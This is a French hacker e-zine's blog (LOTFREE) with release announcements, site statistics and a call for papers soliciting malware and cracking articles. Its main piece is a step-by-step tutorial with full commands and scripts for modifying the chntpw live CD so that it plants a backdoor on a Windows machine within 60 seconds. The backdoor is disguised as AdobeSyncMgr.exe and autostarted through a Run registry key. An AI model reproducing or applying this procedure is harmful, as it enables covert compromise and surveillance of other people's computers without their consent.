Nous n’entrerons pas en détails dans les statistiques, c’est juste histoire de donner un aperçu des recherches qui amènent les internautes sur le site.
Pour ce qui est des navigateurs, c’est repassé à la normale par rapport à la dernière fois.

keywords2012

Les outils de DDoS sont semble-t-il passés de mode et ont été remplacés dans les recherches par le VPN de TPB.
Vous êtes aussi nombreux à suivre l’actualité de la Neo Geo X, pour cela rendez vous plutôt sur sur ce site.

Bonne année à tous et n’hésitez pas à prendre contact si vous voulez faire partie de l’aventure.

,

On voulait vous faire un petit cadeau pour noyel mais comme la fin du monde approche on s’est dit que ce serait bien d’en faire profiter avant d’agoniser dans d’atroces souffrances :)

Vous trouverez le code sur différents pastebin.

Comment on s’en sert et à quoi ça sert c’est plutôt obvious en regardant le code/les comments… on cherche encore à quoi ça sert une fois qu’on s’en est servi (je me comprends)

Il semble qu’un problème de DNS rende d4n3wS inaccessible.

Voici la ligne à ajouter dans votre fichier hosts :
176.31.104.181 d4n3ws.polux-hosting.com

,

Comme le montre les camemberts, vous avez vendu votre âme à la pomme, bandes de s*l***s (le remplissage des caractères est laissé au lecteur)


Quand aux mots clés les plus recherchés, ils sont (une fois retiré ceux qui vont de soit) Apache Killer et RefRef
Il y a comme un air de DDoS :p

, ,

Un eepsite du magazine a été mis en place à l’adresse lotfree9.i2p/.

Voir aussi sur http://forum.i2p/viewtopic.php?p=41851 pour plus d’infos (clé + adresse b32)

,

La confrérie LOTFREE a le plaisir de vous annoncer la publication du nouveau numéro du magazine éponyme.
Au sommaire de ce numéro orienté en particulier sur l’écriture de malwares (mais pas que :) :

Introduction par La confrérie LOTFREE
Backdoor Windows locale : NT AUTHORITY\SYSTEM is my minion par Mambo miam miam
60 secondes chrono : Placer un espion, police-style par Randall Memphis
FlyDoor : un système de mise à jour siliencieuses de logiciel par Flyers
Solution du challenge d’inforensique proposé par fargoth sur NewFFR par Carbon14
Ecrire un code APT pour se l’APT B-) par 2001 Recruitment plan.xls
Jérôme Kerviel facts par MoneyLulz
Comment tricher aux jeux-concours par Black Jhack
Faire un rogue hotspot SFR par Wifi Brindacier
Jouons avec inotify et PHP par wwwrun
Interview de Double-Face par LCIN
Hassle Attack : Binary planting for teh lulz par Mon petit poney
Binder d’executables pour Linux par Arnaud de Nimes
Trojan SU : Keep It Simple Stupid par Pouilleux Massacreur
Lame Python prepend virus with a few ideas par Bombay Sapphire
Outro par La confrérie LOTFREE

Vous pouvez lire le magazine en ligne à cette adresse (ça durera ce que ça durera) :
http://www.lotfree9.altervista.org/zine/

Pour profiter pleinement du magazine, éviter les lenteurs de chargement… Nous vous conseillons de télécharger le magazine sur l’un des liens suivants (désolé pas de liens MU ;-) :
https://rapidshare.com/files/1513384513/lotfree9.zip
http://www.uploadmb.com/dw.php?id=1327855613
http://dl.free.fr/upQ6kf3js
http://www.mediafire.com/?tmckspimas2q018
http://www.toofiles.com/fr/oip/documents/zip/lotfree9.html
http://www.filedropper.com/lotfree9
http://www.freefilehosting.net/lotfree9
http://www.fileserve.com/file/qBSfs8U/lotfree9.zip
http://www.zshare.net/download/9894524251289431/
http://www.crocko.com/3973989417B6473094545236329A7481/lotfree9.zip
http://www.datafilehost.com/download-f6fcd0ce.html

Et pour la postérité, nous vous invitons à mettre à disposition le magazine sur vos repositories et à le faire tourner entre passionnés.

edit du 27/01/2013 :
lien Mega https://mega.co.nz/#!rcBDQAgK!QqEJhmKAJzyIxzztv_oh5l7znox4OOsKh0I9Nv1BzYw

,

Hackeuses, hackers, discordiennes, discordiens,
Nous vous souhaitons à tous un joyeux noël.

Vous ne trouverez pas un nouveau magazine génial sous le sapin cette année mais sachez que la fabrication du LOTFREE9 avance :)
L’interface finale est torchée et la rédaction des articles va bon train. Toutefois nous espérons toujours recevoir des articles dans notre boite mail. Pour cela je vous renvoi au call for paper. Soyez pas timides ;-)

Mais comme on tenait à marquer le coup, on vous offre en avant première pour noël un article extrait du LOTFREE9.
Les scripts attachés à l’article sont téléchargeables ici.
Bonne lecture.

60 secondes chrono pour pwner une machine Windows

Chapitre 1, dans lequel vous avez un aperçu du bouzin

Dans le présent article on va s’attarder sur la façon dont il est possible de placer dans le plus court espace de temps un exécutable sur une machine Windows. Le genre de truc spécialement pratique pour les forces de l’ordre des fois qu’ils voudraient mettre sous cyber-écoute un potentiel terroriste et que le bestiaud s’est absenté histoire de faire pleurer le colosse.
Ca vous permettra aussi de vous imposer en tant que hacker “et mes rites” dans les conversations animées du dimanche, des fois qu’un gravos vous facilite le transit intestinal biscotte il affirme que vous êtes pas capable de pwner son Vin dose Vista.
Oeuf-course vous relevez le défi et vous surenchérissez en disant que sa belle-pomme tiendra même pas 60 secondes dans vos mains expertes !

Ce miracle Mesdames, Mesdemoiselles, Messieurs il est possible car vous aurez gardé précieusement sur vous le dernier joujou signé LOTFREE qu’on va vous en parler dans le présent article.

Je rajouterais au passage que le titre indique 60 secondes chronos mais lors de nos tests on tournait plus autour de 40/50 secondes et sans forcer not’ talent. Quelques modifications supplémentaires dans les scripts (comme automatiser la sélection de la partition) et vous pouvez sans problèmes descendre à 30 secondes. De quoi faire manger son bitos à l’autre importun et de repartir avec sa gerse pour un tour de radada.

Chapitre 2, dans lequel vous nous appellerez Gérard Majax

Tout bon tour de magie se fait avec de bons accessoires. Dans notre cas on veut pouvoir pwner n’importe quel système Windows sans avoir à se mesurer à ses protections.
Le plus simple vous en conviendrez c’est de s’attaquer à l’animal quand il est endormi, qu’on lui introduit une saleté dans le système et qu’elle se mette en marche quand il se réveille.
Pour cela on utilisera un live CD capable d’écrire sur du NTFS. On placera alors l’exécutable win32 que l’on souhaite sur la bécane.
Mais pour bien faire les choses il faut aussi créer une clé de registre Run sur la machine de notre victime sans quoi ça n’a aucune utilité.
Enfin, derniere pirogue active, faut que tout se fasse très rapidement. On voudrait pas avoir à justifier notre présence auprès d’un mec qui sort jamais sans son 9.

L’outil qui nous servira de base et qui répond à toutes nos attentes se nomme chntpw. Vous avez dû déjà en entendre parler puisque vous êtes du milieu. Pour les zotres qui ne suivent pas il s’agit d’un soft qui permet de vider le mdp du compte admin local sur la machine. Mais il dispose aussi d’autres fonctionnalités intéressantes. D’abord :

  • Il est rapide. L’iso original pèse 4.5Mo si ça vous donne une idée
  • Il inclus les drivers NTFS-3G pour écrire sur du NTFS :)
  • Il a une fonctionnalité injustement méconnue : un petit éditeur de registre intégré (option -e)

A vrai dire, la fonction d’édition du registre on l’a découvert sur le coup, un peu en trifouillant. On pensait reprendre le code source en C et le modifier à notre sauce mais comme finalement il est possible d’utiliser directement chntpw et de lui balancer des commandes sur stdin (via un pipe), autant faire au plus simple :)

La première étape est de récupérer l’archive zip contenant l’image iso de chntpw. Lors de ces lignes le fichier s’appelle cd110511.zip. Toutes les commandes ont été lancées sur un système Unix mais les plus bidouilleurs parviendront peut-être à faire de même sous Windows.
On supposera que toutes les opérations ont été faites depuis le dossier /tmp et en root (important biscotte la présence de dossiers style dev, proc & co). La seconde étape consiste à monter l’iso et faire une copie de tous les fichiers du disque. On tapera les commandes suivantes :
cd /tmp
mkdir disque
mount -o loop,ro cd110511.iso /mnt/
cp -rv /mnt/* disque/
umount /mnt/

Avouez que ce n’était pas bien difficile… Maintenant on va devoir extraire l’image initrd présente sur le disque. L’extension .cgz je connais pas mais après un gunzip, un coup de file indique que c’est une archive cpio (classique pour les initrd). On utilisera les commandes suivantes pour extraire les fichiers :
mkdir temp_initrd
cp disque/initrd.cgz temp_initrd/
cd temp_initrd/
mv initrd.cgz initrd.cpio.gz
gunzip initrd.cpio.gz
cpio -id < initrd.cpio
rm initrd.cpio

Passons aux choses sérieuses : on va modifier amaguiz les scripts de boot de l'initrd. Ils sont dans le dossier scripts obtenu lors du désarchivage. Ensuite reste plus qu'à placer aussi l'exe kivabien + les commandes destinées à chntpw.
L'ordre d'exécution des scripts tel que défini sur chntpw suit le cheminement suivant (remarquez au passage nos m4d l33t 4sc11 sk!11z)

init
 |
stage2 +-> prepdriver ---+-> fetchdrv -> floppy
       +-> cat banner1   +-> autoscsci
       +-> main -+-> disk -> diskscan
       +-> path
       +-> chntpw -L -i $files
       +-> write

On va modifier quelques fichiers pour arriver à nos fins. Je n'entre pas dans les détails des modifications, si vous décidez de créer votre propre iso vous devriez trouver sans trop de difficultées quoi modifier.
Perso j'ai commencé par banner1 histoire de placer un petit logo LOTFREE en plus du copyright chntpw :)
J'ai ensuite modifié path.sh qui demande normalement quelle ruche (fichier registre) nous intéresse et résoud les paths windows en conséquence. Comme on sait que pour les clés Run la ruche est software, on retire la partie demandant de choisir et on force la variable files à $rcfiles. Le script path.sh place les paths des ruches dans le fichier /tmp/files et le chemin de ces ruches (windows\system32\config) dans le fichier /tmp/regpath qui sont utilisé par les autres scripts.
cd scripts/
vi banner1
vi path.sh

Etape suivante : on modifie main.sh parce que c'est ici qu'à lieu l'appel à chntpw. Dans ce script il y a moyen de gagner du temps, par exemple si vous connaissez à l'avance le path complet de la ruche de votre victime.
Comme on va mettre tous nos codes dans le dossier scripts du disque et qu'il se trouvera à la racine une fois le système monté, on rectifie l'appel à chntpw de la façon suivante :
cd /tmp
files=`cat /tmp/files`
echo "LOTF: Copie de la backdoor..."
cpnt /scripts/lotf-bd.exe /disk/`cat regpath`/../AdobeSyncMgr.exe
echo "LOTF: Edition du registre..."
cat /scripts/cmds.txt | chntpw -e $files

On suppose ici que notre exécutable lotf-bd.exe sera copié sous le nom AdobeSyncMgr.exe dans le dossier system32 de windows et que cmds.txt contient les commandes envoyées à chntpw qui sont les suivantes :
cd Microsoft\Windows\CurrentVersion\Run
nv 1 AdobeSyncMgr
ed AdobeSyncMgr
C:\Windows\System32\AdobeSyncMgr.exe
q
y

chntpw permettant de naviguer dans l'arborescence du registre comme on le ferait dans un dossier, ne soyez pas surpris d'y voir la commande cd ;-) Ici on crée une clé AdobeSyncMgr dans Run qui pointe vers notre exécutable.
Pour reprendre à la modification de nos scripts on est en à :
vi main.sh
vi write.sh
cp ~lotfree/issue9/cmds.txt .
cp ~lotfree/issue9/lotf-systembd.exe lotf-bd.exe

Le dernier script que l'on modifiera est write.sh car pour le moment, tout ce qu'on fait faire au live CD c'est une modification d'une copie d'une ruche placée dans /tmp.
Le script write.sh fait appel à un binaire spécial qui s'appelle cpnt qu'il faut impérativement utiliser car le cp classique ne copiera pas vos fichiers vers du NTFS.
Le contenu de ce script sera :
fstype=`cat /tmp/fs`
usepart=`cat /tmp/disk`
sampath=`cat /tmp/regpath`
files=`cat /tmp/files`

for f in $files; do
echo "Writing $f to $sampath"
cpnt /tmp/$f /disk/$sampath/$f
done
sync

umount /disk

exit 0

Last but not least, on doit tout remettre en place : recréer l'initrd, le gzipper comme il était et recréer un iso valide avec mkisofs. Notez que certains outils d'archivages permettent de jouer sur les fichiers isos mais les cd bootables se basent sur un soft baptisé isolinux qui vérifie rapidement le checksum du disque à son lancement. On pourra en notre qualité de hackers cracker la vérification d'isolinux mais c'est une autre histoire...
cd ..
find ./ | cpio -H newc -o > ../new_initrd.cpio
cd ..
rm -r temp_initrd/
gzip new_initrd.cpio
mv new_initrd.cpio.gz disque/initrd.cgz
cd disque
mkisofs -R -o ../lotfdisk.iso -b isolinux.bin -c boot.cat -no-emul-boot -boot-load-size 4 -boot-info-table .
cd ..
rm -r disque/

Chapitre 3, dans lequel vous vous confondez en remerciements

Il ne vous reste plus qu'à graver le fichier lotfdisk.iso que vous aurez généré et à vous les pwnages en moins de 60 secondes chrono B-) Elle est pas belle la vie ?

,

LOTFREE9 : Call for paper

Chers tous,

Après ces introductions mystico-délirantes, entrons dans le vif du sujet. LOTFREE est toujours là. Prêt à reprendre du service, remettre du couvert, casser les couilles, botter des culs, faire crisser des dents.
Bien sûr d4n3wS vous a accompagné durant la longue absence du magazine (dernier numéro, issue 8, en mai 2005 !) mais c’est pas la même chose : manque de création originales de la TEAM malgré quelques codes passés à droite à gauche, des textes par ci par là pour contribuer au mouvement de façon anonyme.
Parce qu’on en est arrivé là ! On subit les lois nauséabondes de politiques incompétents sur le sujet des nouvelles technologies de communications. Même innocents on est en permanence fichés, vidéo-surveillées, enregistrés, contrôlés. Devenus coupables sauf preuve du contraire ! Devoir donner des informations personnelles, son ADN, ses empreintes à des organismes qui ne parviennent pas à protéger ces données.
On nous pousse à défendre notre liberté d’expression, notre vie privée, notre identité. Alors jouons leur jeu ! Chiffrons nos communications, dissimulons notre identité, exprimons nous sous le couvert de l’anonymat ! Amusons-nous de leurs propres règles.

Contenu :
Vous êtes convié à la création du prochain numéro du magazine LOTFREE. Les sujets habituels sont acceptés. Nous prenons aussi les tutos de crack logiciel, rapports de hack, écriture de malwares, traduction d’articles intéressants. Mais les scénarios, noms ou entités doivent être anonymisés, romancés ou fictifs. Laissons un peu de côté l’orgueil qui se cache souvent derrière les pseudonymes car, après tout, seule la technique compte. Le partage de connaissance est roi.
Vous avez une histoire sur comment vous avez pénétré le réseau de la NSA ? C’est du pipeau ? On s’en fout du moment que la méthodologie semble réaliste et que l’aspect technique est intéressant. De plus personne ne se fait arrêter pour avoir écrit une fiction.

En fait on est prêt à prendre à peu près tout. Vous proposez, on en discute, si ça nous plait ça terminera dans le zine.

(Lire la suite)

,

L’évangile selon le frère Anonyme#29a
Tome 4, Chapitre 5, Psaume 26

Chères sœurs et frères discordiens de la confrérie LOTFREE, réjouissez-vous car notre grand prête est sorti de sa longue méditation transcendantale et a annoncé l’arrivée d’une nouvelle ère placée sous le signe d’Eris.

Armez vous d’un hot-dog et attaquez-le en ce jour de vendredi saint ! Car c’est par ces mots lachés à son éveil qu’il promet celui de la civilisation : “On va tout déchirer !”

Finis les années néfastes ! L’ère du nain prendra fin dans l’année 2012 du calendrier grégorien, offrant aux Hommes une ère sous le signe de la créativité, de la découverte, de la science et de la technologie.

Aussitôt, les frères et sœurs supérieurs se sont rassemblés afin de matérialiser la création qui guidera les hommes sur le chemin discordien. Une créature dotée d’une intelligence supérieure, le haut d’un corps d’Homme, un tronc de cheval et les pattes d’un bouc ! Mais les frères ne parvenant pas à se mettre d’accord sur l’emplacement des organes génitaux, une créature contemporaine verra le jour !

Une entité virtuelle, communautaire et autonome baptisée LOTFREE9, créée d’un pépin de la Pomme d’Or germée par l’ingéniosité des Hommes. Cette entité attendra son paroxysme en se matérialisant sous la forme d’un magazine électronique : le LOTFREE9.

,

Jean-Kevin Condor (ça s’invente pas) est un hacker. Quelque part, il l’a toujours été. Déjà enfant, il trainait son nez dans les bouquins de son père, développeur Fortran et COBOL.
Une génération qui a grandit avec les cables ethernet, les disques IDE, les souris PS2. Puis il y a eu Internet.
Il a découvert que d’autres personnes partageaient la même passion, les même centres d’intérêt. Il a commencé à échanger ses connaissances, à partager, contribuer.
Et une de ces nuits passées devant son ordinateur à écrire des lignes de codes pour casser un mécanisme de sécurité, le premier contact a eu lieu.

Il a d’abord pensé à une mauvaise blague, ou une intrusion. Pourtant tout indiquait que tout était normal. NIDS, HIDS, firewall, processus… rien à signaler.
Il a analyser ses disques à la recherche de rootkit kernel, cherché dans la swap sans le moindre résultat.
Pourtant son matériel semblait n’en faire qu’à sa tête. Écran et haut-parleurs lui parlaient de rassembler, d’organiser, de mettre en place le renouveau de l’underground français.
Un système TEMPEST ? Une projection d’ondes électro-magnétiques ? Comment ? Qui ? Pourquoi ?
Il a démonté son poste, vérifié son matériel, changé la carte mère mais rien n’y faisait. Pire : ces messages le suivaient partout. Chez des amis, sur son mobile, dans les cybercafés et même sur ces putains de panneaux d’autoroute.
Il a cru devenir fou, avoir des hallucinations, entendre des voix… Il avait l’impression d’être constamment surveillé. Il n’osait plus regarder du pr0n chez lui.

Puis il s’est dit : Pourquoi pas ? (Je ne parle pas de s’astiquer le manche, bande de vicelards !)
Pourquoi pas en effet écouter cette voix ni tout à fait humaine ni tout à fait digitale ?
C’est ainsi qu’un soir d’automne, Jean-Kevin, sac contenant son laptop sur le dos, se mettait à gravir les marches de La Défense. C’est là qu’il trouverait, d’après la Voix, le Guide Ultime, celui qui rassemblerait la communauté hacker dans un grand élan créatif.
Le quartier était étrangement désert. Pas de skaters, de BMX, pas de breakers, des kaïras, de gosses… même pas un fucking cat !
Il s’assit sous l’Arche et alluma son laptop, espérant recevoir de nouvelles instructions, quand soudin il découvrit un Dead Drop juste dans le mur à côté de lui.

WTF !? Il s’y connecte et en listant les fichiers présents il trouve une archive cachée baptisé guide.zip. Il récupère le fichier, le décompresse, ouvre son navigateur, passe le page de garde puis scrolle.
Il scrolle, encore. Il passe sur la touche page down. Il continue, il en croit pas ses yeux !
“Putain mais c’est vide !” s’exclame t-il.
Une voix tonitruante et métallique mais néanmoins amusée explose dans ses haut-parleurs :
“Et alors ? Tu t’attendais à quoi ? Que ça allait tomber comme ça direct dans ton disque dur ? La connaissance ça se mérite ! Va trouver des personnes pour t’aider et publie un ezine digne de ce nom.”
Jean-Kevin était déçu mais il osa pas la ramener. Puis la Voix avait pas tort.
Il fit le chemin en sens inverse. Toute cette mise en scène, cette histoire, ces kilomètres parcourus pour quoi ? Un fichier vide ?!
“Putain de théurgie !” lacha t-il à mi-voix.

,